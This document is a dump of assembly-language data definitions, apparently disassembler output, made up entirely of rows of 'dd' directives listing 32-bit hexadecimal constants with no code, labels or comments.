dd 3879F880h, 59E5EADDh, 274F6F2Ah, 0C401A108h, 26E4E91Bh
dd 1486A666h, 7E992612h, 0F889DCh, 9CEC7479h, 42433F37h
dd 413184Bh, 34ADAC14h, 0A9009305h, 666387C0h, 97674ADBh
dd 0EC77A0C7h, 995ED2BCh, 82D85418h, 7D144E0Eh, 0F8155AECh
dd 5AE87018h, 33D00B98h, 64D9F103h, 3388E709h, 3F932614h
dd 9C854148h, 13D3B0EDh, 74568163h, 42080E00h, 9012064Bh
dd 140CB65Eh, 0EA717027h, 0EA078178h, 0D2141DAh, 5B99AF62h
dd 0EDF30888h, 169B093Ah, 0E6AEC6A0h, 0C24856D0h, 60B43B9Eh
dd 0A2E39ADBh, 2660C2B5h, 1DCCD947h, 68C6F48Ah, 0C0E80321h
dd 0CE26810Dh, 727AB8AAh, 8504B7DBh, 95898040h, 718071C8h
dd 0FA17F8ADh, 40C2050Eh, 46934E50h, 0E927C5EBh, 0CE08253Eh
dd 7BC3B1ABh, 34AE3D92h, 39815AD4h, 1502005h, 4EBE5179h
dd 6CF4F20Dh, 45880048h, 0EFE61787h, 8581B650h, 0AA6944ADh
dd 41A98E95h, 50A0Ah, 8AF3863Ch, 0AA5A7C50h, 0A432254Dh
dd 519C2D2Ah, 0E1A73ECFh, 506C6FD8h, 341DF10h, 4A33787Ah
dd 5BF31BE1h, 2C913BBBh, 0C6739405h, 1A7CE850h, 0D8F05138h
dd 38A17B3Dh, 111550C7h, 650C34B1h, 4F9BF16Eh, 552F734Bh
dd 51470C03h, 46B583B0h, 542B9410h, 77082D38h, 0A134412Ah
dd 6A04661Ch, 0B2310532h, 9C2237D9h, 61B15B2Ch, 0AD07F341h
dd 280D5D8h, 145376E4h, 0DEBBDA4Ah, 2971F31Ch, 6144D651h
dd 5CB231C3h, 0F4D512E1h, 756FEAEDh, 692D7432h, 110A50B8h
dd 0A6520538h, 514D1981h, 0DABE1586h, 9CB625EAh, 14C03ADBh
dd 0A371A330h, 34C672DFh, 1E13B818h, 3AA76314h, 41B2141h
dd 0D03AC59Dh, 384C11C0h, 94B189A5h, 9141A672h, 0B1E0929Bh
dd 0A7D6D59Dh, 0E1D8B45Ch, 82B0EAC0h, 0C96B630Dh, 1418DC63h
dd 589B5C04h, 0C2F4A29Eh, 78E7AFC1h, 1971BAACh, 0D32DCh
dd 0D549CE5Ch, 6C981316h, 690E2D78h, 2CEB29E0h, 8B77C0E8h
dd 4EE6A20Ah, 5DCAB9E6h, 0BB8D8912h, 9CA6B022h, 296D0565h
dd 0B4082E81h, 72165384h, 0D63252CFh, 750A6B9Bh, 2C34C912h
dd 0CCF62974h, 5C736018h, 341DEF6Bh, 0CB5D3002h, 535AC818h
dd 452B8B30h, 2C558DB6h, 0F350E564h, 94085A98h, 0F76B0514h
dd 282E65C0h, 8467970h, 0BCB382Ah, 5B5CD802h, 16EAB964h
dd 0D3E1C163h, 3A8AA4FAh, 4842E2A0h, 0C4E4EA40h, 0B8FFA7C2h
dd 0FEC117FDh, 33C0C214h, 8172A150h, 341C4A8h, 50F00084h
dd 0A996184Eh, 57CA9371h, 11F8D82h, 85A286A5h, 8DACFCFFh
dd 1C28FDBBh, 4B01608Bh, 2A47058h, 8A92A5CCh, 893B4810h
dd 28E4592Ch, 0C1ACA01Ch, 49708250h, 0A4B49B04h, 2B084B00h
dd 2ACCB4C6h, 60D41E4Fh, 0EC21EC12h, 420C00A1h, 0D9670120h
dd 0A30C122Ah, 23177237h, 1DBD008Fh, 0B17A60C4h, 0ED57AE19h
dd 0D0B25EB4h, 79805555h, 240C05B4h, 0A1163A8Ah, 0F5217A08h
dd 602D4C22h, 2F44136Ch, 0A3D0145h, 0FA208F60h, 91E8122Fh
dd 0D104E902h, 0C04AEED6h, 84F5480Bh, 161245Fh, 9602D8FBh
dd 1640917h, 0E5809C60h, 2FD1C02Fh, 0E00A8A24h, 0C1CA1547h
dd 0A02C02EBh, 31869026h, 2778401h, 84B424AAh, 33A60303h
dd 82C1E130h, 0B86C3E23h, 138AC5E3h, 31B8EC7Eh, 432392C9h
dd 0E532B96Ch, 0BE63339Ah, 0CDE733B9h, 0ECFE8343h, 0A2D1E934h
dd 0BA6D3EA3h, 53AAD5EBh, 35BAED7Eh, 0C363B2D9h, 0ED36BB6Dh
dd 0BEE373BAh, 0DDEF37BBh, 0EDFF0383h, 0C2E1F138h, 0BC6E3F23h
dd 93CAE5F3h, 39BCEE7Fh, 43A3D2E9h, 0F53ABD6Eh, 0BF63B3DAh
dd 0EDF73BBDh, 0EEFF83C3h, 0E2F1F93Ch, 0BE6F3FA3h, 0D9EBCE6Bh
dd 7DBEEF7Fh, 0C3E3F2F9h, 0FD3EBF6Fh, 0BFE3F3FAh, 0FDFF3FBFh
dd 0EFFAA992h, 0AA8AA54Eh, 0B2A992BAh, 2801BBD9h, 0D474680Dh
dd 0DECF4B54h, 80774571h
dd 27F9881Fh, 1480F54Ch, 0FCB517A9h, 4A756D2h, 452E6BCAh
dd 89640059h, 64829A91h, 6026BC80h, 29103097h, 0A050CBA3h
dd 22540EA1h, 41011573h, 60553605h, 734D08D3h, 0ADF7660Ch
dd 6A7AA87Ch, 1754D79h, 0A86154A0h, 0DD6CE4D6h, 71008294h
dd 5ED82260h, 416EB2A2h, 506E1725h, 0EED4A6D8h, 4CD8ED09h
dd 51ACB623h, 57574CCCh, 0A519B701h, 78D08C10h, 0B10A9099h
dd 9108907h, 0DE44484h, 83C8348h, 240ADD2Eh, 0A7EC8584h
dd 4E8C2F80h, 5754B402h, 65CD852Ah, 0BD94D0FAh, 306D54BAh
dd 0B0514DB7h, 0DB811EA7h, 75608844h, 3C83883h, 8288248h
dd 2088D255h, 43552877h, 20297EA0h, 2A66DFAAh, 0D2821E06h
dd 0EE064B50h, 0CD84A5D0h, 5C6D6DF4h, 0D05B174h, 815E398h
dd 16400C9h, 6DB81BB2h, 0BE5614FBh, 15A8324Ch, 53176B78h
dd 0ADCA4E0Eh, 76C5709Ch, 2F48B486h, 82814979h, 36DEA1F3h
dd 2F17061h, 0F820284Fh, 98F31294h, 1B90485Eh, 64EC28E3h
dd 17E2BC32h, 1456BA2Ah, 9793D656h, 457AC0ABh, 4FA2A912h
dd 4435A8Fh, 0CF1D6751h, 8E2E0F16h, 0B6A8721h, 33AFCC05h
dd 0D8AD8C45h, 8B15B85Eh, 55C0DD2Dh, 259A6A64h, 92C0C491h
dd 8B13F2DBh, 3153E316h, 63286B59h, 2F23E16Dh, 693954BBh
dd 0CB217626h, 67E31992h, 624455Ah, 0C9661E6Bh, 1CB4186h
dd 937518B3h, 9AE7D941h, 5469479h, 0B83C50E1h, 59941794h
dd 0F90E385Ch, 3F7C025Ah, 0B02256EBh, 0A160A481h, 7355BC86h
dd 48188346h, 1EEB02C6h, 0E37A8AE0h, 3A5CCC59h, 0C1059098h
dd 384EACC4h, 5DC0994Dh, 0CEBB5995h, 6F84687Dh, 99259891h
dd 0C041A955h, 95247CAh, 8B48010Bh, 0AD907A02h, 51C3906Bh
dd 98CAD81h, 41E56690h, 794705C5h, 361F18A3h, 143F7652h
dd 33659035h, 95E0FCB2h, 19B9A846h, 0E28EA1D5h, 0A21714F0h
dd 76530154h, 52E154B9h, 0A8671338h, 0A39E2AD3h, 0F324E2D3h
dd 1965B358h, 57673942h, 0B7C68079h, 90179AF7h, 18596B03h
dd 0ACFACC40h, 3969A395h, 0B80C5747h, 380B7D99h, 91208D24h
dd 704C94DAh, 0E052B330h, 635797EBh, 22F80232h, 64A78480h
dd 527C4804h, 24A0632Fh, 1196A52h, 0B4A5495Fh, 9212624h
dd 8180D201h, 1BF25289h, 4A12C021h, 0CD01002h, 19E24552h
dd 92808CBDh, 296CFA54h, 44334440h, 0C804805h, 4E81ACA8h
dd 1CC04174h, 69144C62h, 292D5148h, 4404A127h, 7AC1A782h
dd 4B3E24B6h, 828B6620h, 5157C92Eh, 9525B2D3h, 6703CB20h
dd 18DC9C7Ah, 8F200C57h, 289B4Dh, 857CC2h, 1BCD02CDh, 47F02018h
dd 340305F9h, 0BE60C405h, 8B231235h, 0C0D02F32h, 0E0E80E07h
dd 0E010AD75h, 1C943F03h, 7523D741h, 23400119h, 0A25284A3h
dd 89441282h, 25FCF521h, 0F04BC896h, 4BA884A3h, 0CC84312Fh
dd 0C7950EC2h, 5BC4BB80h, 0E3D4011Ch, 8040F400h, 8798023Ch
dd 84B88970h, 12DE25B0h, 4B5896A1h, 2D225A04h, 0B3896612h
dd 0CA25904Bh, 1896212Ch, 225804AFh, 895E12BAh, 25704AD8h
dd 95A12B22h, 5604AB89h, 5612AA25h, 504A9895h, 212A2254h
dd 4A7894Eh, 129A2528h, 4A389451h, 28425F0Fh, 492F1EF3h
dd 24D61010h, 6BCCE690h, 0C8216F33h, 0A242A084h, 0BCCEA908h
dd 618F47BCh, 0CEC90E61h, 825AB33Bh, 0A4308859h, 0CCF090ACh
dd 215333CAh, 429884ECh, 0CF4908C2h, 10F33DA4h, 20863CFFh
dd 333E243Bh, 6004370h, 96412B42h, 5404A289h, 7E3CC875h
dd 12D82584h, 4AB094F0h, 0AA8A9906h, 0C012C313h, 0C0AE89E4h
dd 42060404h, 0F0452290h, 524EE691h, 850047F0h, 649812C0h
dd 5409E21Dh, 0C9E25127h, 9C1AAB84h, 841DDCD5h, 8D12C43Dh
dd 0FF4A0190h, 986C9177h, 35C26009h, 82507BCh, 5C095DC0h
dd 31DCD0D1h, 0DE591DCCh, 0CCABBA89h, 61ABBD4Eh, 0E8FB16B0h
dd 30D55604h, 2E4B91ADh, 495DBC96h, 0A0B1A14Ch, 59663963h
dd 7585AA85h, 0BEE17526h, 0A6C2032h, 38469A29h, 2A9F8508h
dd 0E5E0322Ah, 0B53A2D49h, 0DEF2E8E3h, 0ED806EFFh, 4C0857D7h
dd 0E2306F2Ch, 0CEF7CA1Dh, 5D284B12h, 0D095E6DCh, 23314A6h
dd 46CD725h, 0D2BA0043h, 2BB028B5h, 25A2F37h, 36B7656h
dd 3B0D89D2h, 36B65918h, 8260F089h, 6B8DCAE8h, 0BB0E74C9h
dd 201DB424h, 0BB264046h, 0BB078655h, 6DE797ACh, 5EB717Ah
dd 0F85EC517h, 0B305ED31h, 7B6A745Ch, 4742F1D0h, 0D8743D00h
dd 62F2E896h, 65B1D1h, 6474601Dh, 19C746E1h, 0D1D60052h
dd 0F2B98125h, 0D9F33817h, 0E80D4141h, 0B4C07FC9h, 51CCD26Eh
dd 6A29F286h, 0A0903A38h, 4581000Eh, 9AF7C23h, 0EC01C1ADh
dd 43A79C27h, 55AA4908h, 0CC647513h, 54126440h, 86925E8Ch
dd 4532888Dh, 530637F3h, 23E72C02h, 0F2E7BD86h, 0EE460CADh
dd 0EA04230Ch, 2132A849h, 6C86D80Dh, 0C01098h, 13994342h
dd 0EA419709h, 4B4E140h, 702947A2h, 0D50A9AB9h, 8C28B21h
dd 3930C5B0h, 732F3F4Bh, 0F378C79Ah, 30868A7Fh, 0E09253AAh
dd 93496169h, 92841169h, 454EA05Ah, 5A021349h, 4B0E3560h
dd 0F02BCAD0h, 98BED729h, 5C23497Dh, 0A60A1919h, 20199357h
dd 0A0B461C5h, 49701912h, 6AE0A5A6h, 0E1639230h, 621C034Bh
dd 296B15C8h, 605F1513h, 914F9952h, 0EE116E9Ch, 62578ADh
dd 51F7F6EFh, 0E2038A0h, 95D318AFh, 5C739311h, 0CFFA2212h
dd 0AE04D691h, 6066853Dh, 7026082Dh, 17450309h, 0D4BC90A2h
dd 10000B28h, 72174984h, 34025A0Ch, 559D86F1h, 17024E40h
dd 2C03CAE5h, 28178C80h, 83448496h, 8C6E4ED5h, 0FA153134h
dd 0B27594FBh, 2F7EF4F4h, 73281648h, 3CBD8033h, 0F6EDC170h
dd 148442B0h, 5C0F6AE4h, 0E201498Dh, 0D701F1Ah, 9004C5D8h
dd 2786B99Eh, 1C7084AEh, 243A1BFCh, 67790EF4h, 1D1A4A0Ah
dd 752C9DEAh, 722D69E3h, 59E34C61h, 30C45681h, 0E610C349h
dd 0F0687A96h, 61059830h, 38DB8E01h, 9156460h, 97B8741Bh
dd 0B104160Ch, 4228A1B6h, 8156179h, 851008C1h, 956212DCh
dd 88690380h, 9599162h, 44022B54h, 52D914B7h, 452E1891h
dd 80C6E534h, 0B040E392h, 0F8043629h, 0C513ACD3h, 864DF636h
dd 14A46E7Fh, 56093BBBh, 0D54786E4h, 2FDA6C08h, 0BD5BC4F8h
dd 227F0B0h, 3804DC6Fh, 0B3E1CE0Eh, 0C492F6Dh, 0A29D87CAh
dd 93F76A9Eh, 929A8CA7h, 0C38AA917h, 1178FB8h, 2C7A2A86h
dd 8298E748h, 21F7FA9Fh, 75B28EB2h, 20B9C402h, 84555h
dd 3E107703h, 4F878C92h, 0A83D79B0h, 6703E73Ah, 0D281B674h
dd 8BD56Dh, 0F622C109h, 0DE3EA022h, 7E042A4h, 0C5E8B9B2h
dd 9EEE3630h, 115CA85Ah, 804365D6h, 98A86880h, 42F48203h
dd 13D8D78Fh, 0FD0E879h, 0A92017F8h, 0E36B4423h, 0C5DED407h
dd 518EE010h, 15454889h, 4CC6E2E9h, 6D4C198Eh, 0B6906070h
dd 0E8EE022Fh, 3EAAD78h, 0DD9EAC30h, 79F0F680h, 82AC2800h
dd 81337DCCh, 41DC45BAh, 410FB0F8h, 38197732h, 30129458h
dd 191BD50h, 250C2A2Ch, 228C82C7h, 0A15129EBh, 59F21E36h
dd 8C80C7A4h, 0DBB55C0h, 0C562F3Ah, 7B982116h, 51E0B812h
dd 83A7D7B3h, 5B894413h, 0AD5A6277h, 35052D98h, 34B9BD4Eh
dd 0F5B6467Ah, 2B8A09E6h, 0D6228F0Ch, 64250741h, 598C7172h
dd 42022EFh, 4944114Bh, 6BB98211h, 99460CC5h, 0B899F69Bh
dd 9D0BA52Dh, 38C849F1h, 3164658Ah, 3C5BF381h, 9821186h
dd 11C34E0Eh
dd 0B1011B2h, 49C0E679h, 422BE3D8h, 2413DDEh, 554E6596h
dd 0BC983Bh, 0C78CC3h, 455D3C4Ah, 40069D3Bh, 46C466D4h
dd 0E554E3B8h, 7C4487A5h, 0F89A7B60h, 3EB785D6h, 7F852584h
dd 51FC05BCh, 8A85614Eh, 624FE780h, 0A1247143h, 61630E6Bh
dd 36502B14h, 7094B096h, 0B4780C47h, 618325F0h, 0D4E456E6h
dd 81E1A20Eh, 853CA697h, 0B9892BB4h, 42E6460Eh, 9626B808h
dd 62EE1729h, 0A7866327h, 4350A67Eh, 71D36E24h, 0A18C32A2h
dd 8DD8B882h, 0A6E39947h, 0F66E47D0h, 0C130AB67h, 3ED7069Bh
dd 0F0422B6Ah, 61358E19h, 5D9F3198h, 1DCA5E97h, 3127F352h
dd 5A50F402h, 354D054Bh, 40125C66h, 6D333754h, 1B8B240h
dd 1595152Fh, 0E14B1105h, 3E271C06h, 12C6143Bh, 3A4737B9h
dd 8A1C5649h, 0BA420B0Dh, 4185C566h, 0C95F2E17h, 8B5778FAh
dd 9538045Dh, 5DE5410Fh, 0C173F119h, 1515AB0h, 0B2B1B7AEh
dd 0B600C304h, 0AE404164h, 12BFC14Eh, 0B388917Fh, 52CFF195h
dd 0E667A80Dh, 15876238h, 775B8C16h, 84713316h, 0D8943902h
dd 29E5C4F0h, 30E3D266h, 0F7FD39E4h, 1CAFB5AEh, 0B00916BCh
dd 0AB124AAh, 55CACF42h, 0AA310AD4h, 0E80E78CFh, 701CBC97h
dd 6BA3B859h, 74BB6692h, 0AB987263h, 840D6A86h, 0FE0243E4h
dd 5E0DAAF3h, 30ACA374h, 6A2AA4Dh, 0C0B270DAh, 0D081E08Bh
dd 0CBC2AF08h, 5DBE206h, 80F8D52Ah, 0B70E0EF6h, 2792A526h
dd 33A618D4h, 0EF0906B2h, 0E618146Fh, 6018F814h, 4F5F40D6h
dd 0C609D68Ch, 518580D9h, 56BA6C1h, 0C6C054D5h, 0D2CC6145h
dd 882BD705h, 269CB8CEh, 29BAA3A0h, 27F5528Ch, 4EA0B9CBh
dd 8449D898h, 409D022Dh, 0BAC8BB73h, 2D5450F5h, 25C020D7h
dd 0E8DBB03Dh, 0DCD973E0h, 6CC4BF1h, 542C8D12h, 6F71E7FEh
dd 0F81B5D2Fh, 6CA7A673h, 56C5D1BEh, 3112759Dh, 260A7F92h
dd 0EAD7A39Ah, 0BCC6AA0Fh, 0D880D6F0h, 712DF616h, 6324E1DFh
dd 61955BA5h, 74DDCBFDh, 0B1EF6034h, 0F06EE66Ch, 0EFC4A704h
dd 95A4AF93h, 0D47DF7Bh, 0F8D9D370h, 0FE668619h, 24B7CB3Dh
dd 374C25CEh, 0B74AEE6Ah, 7615CED6h, 23F376A9h, 5467D98Bh
dd 6F1A63A8h, 0E449E07Bh, 0E3DFEB3h, 0BFF9C2FCh, 7E8F91Dh
dd 3F56A363h, 0E541ACF2h, 92514C2Ch, 2B6F279Ch, 486372EFh
dd 0E5B6594Dh, 89C34DD4h, 0EA973855h, 977652D5h, 76977278h
dd 581C2CB2h, 0E592D0FAh, 2CD4BB64h, 0F235A8B8h, 62CC70B4h
dd 75137C78h, 0CFA20D24h, 0CDC7F33Dh, 6C2CD61Dh, 0F4B8682Dh
dd 5108B707h, 4919845Bh, 26F1EA65h, 0DE9127DAh, 0EF36134Dh
dd 9C323939h, 0A56ABB14h, 0EA7F2B39h, 5BF9DBE5h, 0D68F760Bh
dd 1EB26163h, 0D2DE2284h, 0F9184844h, 0B8F8CFDh, 7FF7D90Fh
dd 5DB2A1A4h, 0FBE8FF26h, 0BE578B8Fh, 1ACFE684h, 0DAB0BAE2h
dd 0FBBB97CEh, 0DD3C9D7Dh, 69FA5BFDh, 4A1D51C6h, 5A20B9BDh
dd 5F67071Fh, 8CF37C15h, 0B916BA51h, 0D750910Eh, 597DF235h
dd 0A10E4EEh, 9BEC50B1h, 379DBC4Eh, 54304F9h, 0D22FF53Ah
dd 0DF0AAD39h, 8CF420BBh, 650E1337h, 4F37AF50h, 0F123181Bh
dd 6F694404h, 0A140A07Ah, 3511137Dh, 6FB85154h, 484C66CBh
dd 0C94E5131h, 3C5B4FFFh, 554504B7h, 0E26F7F25h, 15136396h
dd 8B4ED458h, 49AC4B8Fh, 25517132h, 926B4F3Dh, 4604E952h
dd 8B679464h, 4F1C969Fh, 3851A136h, 0BD5C662Dh, 46C4B2E7h
dd 3597751Ch, 12EB0295h, 0D65474B4h, 0DE4A6F3Eh, 0DDAAC25Dh
dd 295D4FDDh, 77AA3E2h, 6D6A711Ch, 1A9009ABh, 0EFD9BDCAh
dd 42244265h, 0B496A910h, 93F90FECh, 0EA9189E4h, 877BF7CAh
dd 48270B1Fh, 0A89EA928h, 83A90AC9h, 0A93096FCh, 140CF293h
dd 8970B743h, 0A14A5027h, 0F25FD2A3h, 2948926Eh, 493AE295h
dd 9ED9571h, 2B4A5627h, 7F6795CEh, 0A9609DEBh, 1EBF16A5h
dd 0A26A3657h, 79E29709h, 0E6D77B68h, 0EA5E24EEh, 6B828A29h
dd 8096481Fh, 0C698A621h, 3080ACDEh, 50B794BBh, 32990647h
dd 2FF8E829h, 98930DF5h, 520CA682h, 462A5EFEh, 0B29A86A6h
dd 219CF9D9h, 6AB24832h, 9B04AA41h, 71ABA9B8h, 9B8E8EEEh
dd 64A70272h, 3A1D238Ah, 72254F57h, 41A8A9D0h, 999F5E3Bh
dd 0BEA7626Ah, 0A66FC2Ah, 78258EB5h, 0C9E2A9E8h, 9CBC5507h
dd 0C6A7C25Ch, 0CBD8EEEAh, 7E268F71h, 0B2EB2C00h, 9FC31EFAh
dd 0EAC08960h, 97C5E86Bh, 425CB57h, 0F0D0AC18h, 9EC9CD92h
dd 34B0824Ah, 23D6391Ah, 0C289E9F5h, 0F7A9DA15h, 8628ADE7h
dd 8DB25871h, 25753B97h, 8D6204CEh, 5864DEAEh, 74FA4FCAh
dd 83F0B812h, 1E3EE30Dh, 0D18F7AFCh, 1CDEB5F7h, 0B5EABC1Bh
dd 0B77BAFF4h, 0F35F5DD5h, 0BE2F72D5h, 59FE106Dh, 328AC68Bh
dd 8B7DB1C2h, 0B5D0D0F0h, 821D9FC4h, 637478E4h, 4E6B0BB8h
dd 98C25F4Fh, 0C8FEB77Eh, 0DCA32724h, 0E3D02F7Ah, 0BE54CB79h
dd 0BEE4C561h, 4573D3CAh, 6435BCCEh, 259E3B43h, 0DB50A7DCh
dd 0BDF7538Bh, 4C955FACh, 0BFCCE4A5h, 4913D9FAh, 0EB4EB576h
dd 0FE5D7E2Fh, 58A3D2B1h, 919A25B3h, 0B19E82F0h, 6BB9DDDFh
dd 2E0FD5BEh, 4DA5529Ch, 0D58A2FDDh, 0B84C2B50h, 1ACE4672h
dd 521DF7ECh, 7B25F159h, 8C2F81FFh, 0B3C9A665h, 2226EB16h
dd 8C3D2B69h, 8ED3E3FFh, 36486CBAh, 19DBD253h, 0FF5BE8EDh
dd 236B4722h, 0C02AFEF4h, 2393BCF9h, 0AA1253BDh, 3F2B08A8h
dd 514AFF19h, 4FF2A165h, 0F19B476Bh, 0EA861747h, 5E6D6AAh
dd 1A51FB64h, 0FA56A871h, 5AF7B41Fh, 0DAA1E579h, 90DFA26Ah
dd 8812D00Ah, 0FFF10001h, 0D043F974h, 9E1D1A13h, 4F3F1B51h
dd 0F261175Ah, 0C5436BB0h, 9E19C3F5h, 5FC890E7h, 0A6B152E7h
dd 43377175h, 0A286307Fh, 99A35D1Bh, 8152B493h, 0B5165034h
dd 238028E9h, 0C02EC608h, 61A59A0h, 21859686h, 0AE71A507h
dd 1782857Ch, 582C6D2Ch, 0AB89D814h, 0AA008690h, 0BBC753E4h
dd 263895E2h, 0C177A550h, 0A34A1E1Dh, 23026954h, 0C58141A3h
dd 23775504h, 58F30052h, 0B59D3010h, 7CA580h, 4DD03F9h
dd 10120866h, 82818DDh, 14C2418h, 22229A32h, 0C231662Eh
dd 89730863h, 0D280096h, 6BF678C9h, 9429C0Ah, 4BF3A3D7h
dd 64581306h, 4AB4146Bh, 0D9C25D09h, 1BD54101h, 566A3915h
dd 0D21C5748h, 615E873Dh, 0B8BBBB74h, 75F174B5h, 36757273h
dd 0F43332F2h, 0B231F1B1h, 34F076B6h, 30F5B094h, 4980176Ch
dd 6CC023F1h, 8216D001h, 0E021B029h, 936D69EAh, 0C39305A2h
dd 0AC58A010h, 6EAAD30Ah, 0DA602193h, 0E46B0974h, 0C296B4E5h
dd 0F17C23A3h, 0EBCB7E1Ah, 59070968h, 57D8D713h, 0A0B5B001h
dd 0CE0982Bh, 92F99B3Fh, 8EB2FA45h, 587DE042h, 195B980h
dd 29CEA5B0h, 0FCB630A0h, 4955BFDAh, 0E9F6F943h, 0A098A2C3h
dd 6E007A83h, 98699AD1h, 9D199C11h, 9E365D2Ah, 82BDFD6Ch
dd 0D6EA0798h, 22155729h, 0F3E6519h, 80AE7586h, 143B519Dh
dd 5F8352FDh, 9F5731Ah, 6F3510C6h, 6A841597h, 18F91604h
dd 0C67E1B52h, 0BC3C20BCh, 244EB0Fh, 1E2F5017h, 4C417FA0h
dd 0CB3120FCh, 9D4C4041h, 5EBF0F48h, 82C0A014h, 5A6CCBE9h
dd 402B8A20h, 1F96B38Fh, 0C04C3103h, 1298155Bh, 41AB9745h
dd 2489698Bh, 480500E5h, 8C02A5D6h, 27734D08h, 0DDD698CAh
dd 9596CE22h, 0AE2F8EE7h, 0D069FC7Ch, 0C7801FEAh, 8D569354h
dd 71722B59h, 0A79B2B4Bh, 3B4C2545h, 0A209E150h, 489E342Ch
dd 0C38EC525h, 0A4AAB503h
dd 0B41AA020h, 2FE6E32Fh, 0CC85D956h, 81283757h, 3881845Fh
dd 0ED0E559Ch, 0DA5CEE60h, 6D56A4D4h, 0C8CCA973h, 32358A81h
dd 10210101h, 400105F3h, 56A75500h, 866AF2C4h, 0A95BA7Dh
dd 4C4D1B01h, 6369CE53h, 32B8A709h, 1475C20h, 5D15C85h
dd 0B4A6BAAh, 664C673h, 3259549Bh, 4E1E7543h, 2F3E23CFh
dd 0D0308023h, 6B1B9ABh, 0C74D983h, 3A60C49Ch, 0C7BC0613h
dd 24726E0Ch, 13610303h, 29936720h, 19AB187Fh, 3EC78F2Fh
dd 0DB32BB13h, 743E030Dh, 1EEE1AB3h, 0A2ECE743h, 30C68BB6h
dd 80069672h, 6595EFA6h, 4B9DD9h, 67096110h, 0FC6B5D5h
dd 0BB630C38h, 94F75C09h, 2A8AEC14h, 8AED60ACh, 0E4EF80Bh
dd 0CC39A50Ch, 336E852Ah, 96F247EDh, 85C0182h, 0A76EB097h
dd 0B99C7586h, 198B3464h, 481128D6h, 936EB42Ch, 0C40ED4E7h
dd 0F0B0640Fh, 0A9B6F357h, 558C863Fh, 66207663h, 0F988366Eh
dd 0C6407C6h, 20464074h, 0A903CB52h, 75356D31h, 0D49D4624h
dd 0D1FE1C1Ah, 1F174749h, 7CBCA8B7h, 8A083128h, 2A28305Ah
dd 58965CBCh, 52CB4426h, 0EE9900A6h, 5A6EC16Ah, 0EA5C330Ah
dd 2B3B8F18h, 0A95A4829h, 60B049F4h, 8D65CFC7h, 0FCA793B1h
dd 9E634D51h, 0BC063477h, 2A6B44E0h, 0D95649D5h, 28B4DAE5h
dd 0DD49F60h, 642EB912h, 1F620435h, 45301CABh, 6806940Fh
dd 514485A9h, 944A691Ah, 705C1724h, 0F160136Eh, 2AE29068h
dd 0E0C2F2FDh, 594F2A93h, 0E7DCED58h, 167110Ah, 11187446h
dd 80F1624Bh, 43666245h, 7E2C65F0h, 727AE27Ah, 0B91FEDE1h
dd 7C5CEA4Bh, 0EF103505h, 0D7B1B818h, 5EF418B7h, 605362DDh
dd 8193D17Bh, 231DEAC5h, 0C7033911h, 1E0F9C65h, 117CA065h
dd 454E5439h, 98305CA6h, 0B54143Ch, 2CA61DD0h, 0D2954F7h
dd 0D61E17A4h, 1C61080Dh, 0CD8D51CBh, 0ABADAD13h, 19966F50h
dd 8D414902h, 0A8C509CCh, 890E8476h, 38860008h, 6186909Ah
dd 256749FEh, 0FA3113h, 60D3A55h, 39A51004h, 67541B63h
dd 83F5E5DDh, 1BA24FA5h, 620289E7h, 0D18C1C7h, 58C024FAh
dd 1D40A54Eh, 3AC2E8C5h, 6C476026h, 34D8F216h, 4021ED47h
dd 0CCADA98Bh, 64452B74h, 3A855409h, 6D252F00h, 7540014Bh
dd 2536D17Ah, 0AE82E54Ah, 826510B5h, 0A5E02C0h, 8ABB8A09h
dd 72BC86B0h, 1CD26A0Ch, 132AE5E4h, 0C1732B06h, 68969611h
dd 4AADC1DDh, 39A03574h, 15AC8C0Eh, 5A132DB5h, 0D717258Eh
dd 250DA12Fh, 2948541Dh, 1AFA97D0h, 5861597Ah, 0E18EC51Bh
dd 0BE9D43h, 0F8D91139h, 124AAD10h, 3A9713FBh, 523FCF5h
dd 8A3852A5h, 61AC96D8h, 5650AC40h, 236322C5h, 93A26D45h
dd 77C0D650h, 9B1D41B6h, 0A0DD9634h, 95F2AA3Eh, 0B821A5E1h
dd 70819620h, 80A953B1h, 0F9A023Bh, 0C0198298h, 241E00A6h
dd 0C983C22h, 0B8B0E1E6h, 7C4536D9h, 0AB82EEB6h, 0B21A6805h
dd 88B10049h, 7D2B20A3h, 0A0BE7000h, 54C448A7h, 28D54D6h
dd 0B7A0D035h, 55D1012Eh, 60196355h, 474580A1h, 0F15386D6h
dd 0C80673B5h, 23CB0AA1h, 716E06F0h, 727588D9h, 572B10BBh
dd 0A3FB018Ch, 0B22AA281h, 0DF4BC0A3h, 4465086h, 50084E99h
dd 7FC48C36h, 96029E05h, 548552F3h, 0DCB24C05h, 43003431h
dd 357953E0h, 61AA43CAh, 0BFE323D6h, 4041BA02h, 93940530h
dd 0A9562868h, 13125FF0h, 50226A2h, 463C5001h, 0A9974040h
dd 0B4445851h, 0C98078EEh, 18A3A029h, 720107A0h, 0C2904111h
dd 65CFB709h, 0F5427C08h, 310614C8h, 12510041h, 8E156A87h
dd 24A02C9h, 9F31C280h, 0DF4B986h, 8C41A53Ch, 0AE020D91h
dd 85208269h, 474A6441h, 3C865D10h, 0CA441440h, 0F348083Bh
dd 42AA2078h, 144A203Ah, 652209E4h, 0B12F2372h, 7DF464C7h
dd 8249B91Dh, 3C89F5A0h, 28661116h, 4C728008h, 38064CE3h
dd 3746E87Ch, 531341B2h, 0BC31A75Ah, 1A01FA61h, 114F3089h
dd 6C13EE02h, 5CC2AA34h, 398464C5h, 0ED827D9Ch, 4BF89F43h
dd 2248460Ah, 0A399C47Eh, 0FE27DB04h, 0A91124F2h, 0B0244C99h
dd 0DB047E63h, 85001B90h, 1439464Ch, 7B4896C1h, 1EE423F6h
dd 513EF024h, 553EF825h, 0FC47BC08h, 0FDE04FBFh, 94B2269h
dd 0E4F01069h, 559333Fh, 8FCC70Ah, 3452EAh, 817864Ch, 7B109651h
dd 1E09264Ch, 54BC27D2h, 0C4B889F7h, 512F023Dh, 2C47EE22h
dd 7D404A21h, 144F2400h, 832C2AC9h, 994047E6h, 385001ABh
dd 81425593h, 1EB62578h, 47AB88FDh, 5C4FAF09h, 6A13EDC2h
dd 5C447AF0h, 8FDA84FBh, 2897D13Eh, 82455088h, 15473288h
dd 0FDF44FB6h, 95022A9h, 0E5412AE2h, 3DB047E6h, 3852E946h
dd 42F3475Ah, 70B48084h, 23148463h, 0DE878F90h, 1B1FE011h
dd 8CF2509Eh, 255F4B08h, 96A52E8Ah, 50CE5213h, 0C4AC2964h
dd 0D2E72503h, 0E59556B0h, 0D48CCA97h, 1A3916h, 0A1344376h
dd 0F9141232h, 282E4E32h, 195F08ADh, 98D15A0h, 2A90192Ch
dd 0D1C0470h, 4338555h, 0AF166D0Dh, 25097106h, 7FCC217h
